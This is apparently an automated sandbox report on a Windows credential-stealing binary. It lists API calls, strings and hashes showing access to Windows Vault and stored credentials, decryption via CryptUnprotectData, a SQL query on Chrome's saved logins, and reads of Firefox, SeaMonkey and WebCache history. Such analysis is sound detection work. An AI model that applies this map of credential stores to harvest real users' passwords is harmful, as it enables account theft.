                                                  • Opcode ID: c7f6c6ad16e89a48cb0e0d64ac08aa0b3efbd1f5f4a19e75b38d6438d40399e7
                                                  • Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
                                                  • Opcode Fuzzy Hash: c7f6c6ad16e89a48cb0e0d64ac08aa0b3efbd1f5f4a19e75b38d6438d40399e7
                                                  • Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                  • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                  • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                  • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                  • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                  • API String ID: 2238633743-2107673790
                                                  • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                  • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                  • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                  • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
                                                    • Part of subcall function 00408836: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                    • Part of subcall function 00408836: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                    • Part of subcall function 00408836: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                    • Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                  • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                  • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                  • DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                    • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                    • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                    • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                    • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                  • WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                  • CloseHandle.KERNEL32(?), ref: 00408C30
                                                  • CloseHandle.KERNEL32(?), ref: 00408C35
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408C3A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408C3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWritememset
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                  • API String ID: 2121777953-4002013007
                                                  • Opcode ID: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                  • Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
                                                  • Opcode Fuzzy Hash: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                  • Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040286E
                                                  • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
                                                  • memset.MSVCRT ref: 004028C7
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A
                                                    • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                    • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                    • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                  • memset.MSVCRT ref: 0040293C
                                                    • Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
                                                    • Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C
                                                    • Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07
                                                    • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                    • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                    • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  • memset.MSVCRT ref: 00402A95
                                                  • memcpy.MSVCRT ref: 00402AA8
                                                  • LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2
                                                  Strings
                                                  • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
                                                  • chp, xrefs: 0040288D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
                                                  • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                  • API String ID: 3603309061-1844170479
                                                  • Opcode ID: 99d4842a7612bd86dcae5b842672bed75adad362ebd04f8eaabe29f208d39f1f
                                                  • Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
                                                  • Opcode Fuzzy Hash: 99d4842a7612bd86dcae5b842672bed75adad362ebd04f8eaabe29f208d39f1f
                                                  • Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F0F8
                                                  • memset.MSVCRT ref: 0040F10D
                                                  • memset.MSVCRT ref: 0040F122
                                                  • memset.MSVCRT ref: 0040F137
                                                  • memset.MSVCRT ref: 0040F14C
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcslen.MSVCRT ref: 0040F172
                                                  • wcslen.MSVCRT ref: 0040F183
                                                  • wcslen.MSVCRT ref: 0040F1BB
                                                  • wcslen.MSVCRT ref: 0040F1C9
                                                  • wcslen.MSVCRT ref: 0040F202
                                                  • wcslen.MSVCRT ref: 0040F210
                                                  • memset.MSVCRT ref: 0040F296
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 2775653040-2068335096
                                                  • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                  • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                  • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                  • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F309
                                                  • memset.MSVCRT ref: 0040F31E
                                                  • memset.MSVCRT ref: 0040F333
                                                  • memset.MSVCRT ref: 0040F348
                                                  • memset.MSVCRT ref: 0040F35D
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcslen.MSVCRT ref: 0040F383
                                                  • wcslen.MSVCRT ref: 0040F394
                                                  • wcslen.MSVCRT ref: 0040F3CC
                                                  • wcslen.MSVCRT ref: 0040F3DA
                                                  • wcslen.MSVCRT ref: 0040F413
                                                  • wcslen.MSVCRT ref: 0040F421
                                                  • memset.MSVCRT ref: 0040F4A7
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  • API String ID: 2775653040-3369679110
                                                  • Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                  • Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
                                                  • Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                  • Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2238633743-70141382
                                                  • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                  • Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
                                                  • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                  • Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                  • wcslen.MSVCRT ref: 00408678
                                                  • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                  • memset.MSVCRT ref: 00408725
                                                  • memcpy.MSVCRT ref: 00408746
                                                  • _wcsnicmp.MSVCRT ref: 0040878B
                                                  • wcschr.MSVCRT ref: 004087B3
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                  • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                  • API String ID: 1313344744-1864008983
                                                  • Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                  • Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
                                                  • Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                  • Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                  • Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
                                                  • Opcode Fuzzy Hash: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                  • Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040952C
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
                                                    • Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                  • wcschr.MSVCRT ref: 004095B8
                                                  • wcschr.MSVCRT ref: 004095D8
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                  • GetLastError.KERNEL32 ref: 00409607
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
                                                  • FindCloseUrlCache.WININET(?), ref: 00409644
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                  • String ID: visited:
                                                  • API String ID: 615219573-1702587658
                                                  • Opcode ID: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                  • Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
                                                  • Opcode Fuzzy Hash: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                  • Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                    • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                    • Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
                                                    • Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                    • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
                                                    • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
                                                    • Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                    • Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607
                                                    • Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
                                                    • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                    • Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
                                                    • Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
                                                    • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                    • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                  • _wcslwr.MSVCRT ref: 00409AFC
                                                  • wcslen.MSVCRT ref: 00409B11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 4091582287-4196376884
                                                  • Opcode ID: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                  • Instruction ID: 093a45ac9553ae88d2071121675ee446b985e814abadd75c8d2b77a0ae050712
                                                  • Opcode Fuzzy Hash: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                  • Instruction Fuzzy Hash: F731D872A1015466CB20BB6ACC4599F77A8AF80344B25087AF804B72C3CBBCEE45D699
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00409102
                                                  • memset.MSVCRT ref: 0040911A
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • wcslen.MSVCRT ref: 00409136
                                                  • wcslen.MSVCRT ref: 00409145
                                                  • wcslen.MSVCRT ref: 0040918C
                                                  • wcslen.MSVCRT ref: 0040919B
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  • API String ID: 2036768262-2114579845
                                                  • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                  • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                  • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                  • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  • API String ID: 3510742995-2641926074
                                                  • Opcode ID: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                  • Instruction ID: 3c8b5220aebea45aa68cfe54a9ecef019ebf38e5b75abdf02c998a5d3c6681b4
                                                  • Opcode Fuzzy Hash: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                  • Instruction Fuzzy Hash: 8E71D4B1600301BFF310AF16DCC1A6ABB98BB45318F14452FF459DB252D7B9A8D18B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                    • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                    • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                    • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                    • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                  • memset.MSVCRT ref: 0040330A
                                                  • memcpy.MSVCRT ref: 0040331C
                                                  • wcscmp.MSVCRT ref: 00403348
                                                  • _wcsicmp.MSVCRT ref: 00403385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                  • String ID: $J/@
                                                  • API String ID: 1763786148-830378395
                                                  • Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                  • Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
                                                  • Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                  • Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
                                                    • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
                                                    • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
                                                    • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9
                                                  • memset.MSVCRT ref: 0040EE42
                                                  • wcslen.MSVCRT ref: 0040EE59
                                                  • wcslen.MSVCRT ref: 0040EE61
                                                  • wcslen.MSVCRT ref: 0040EEBC
                                                  • wcslen.MSVCRT ref: 0040EECA
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memsetwcscat$wcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 2541527827-467022611
                                                  • Opcode ID: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                  • Instruction ID: 5a7552f2f2193819142f663f69cd0b376b18013dc8e05bcebec127321fadfdaa
                                                  • Opcode Fuzzy Hash: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                  • Instruction Fuzzy Hash: AD315232D0411DAADF10EBA6D845ACDB3B8AF00319F6048BBE514F21C1E77CAA45CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memsetwcscatwcscpy
                                                  • String ID: Login Data$Web Data
                                                  • API String ID: 3932597654-4228647177
                                                  • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                  • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                  • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                  • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
                                                  • CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
                                                  • GetLastError.KERNEL32 ref: 00415CAD
                                                  • free.MSVCRT(?), ref: 00415CBA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
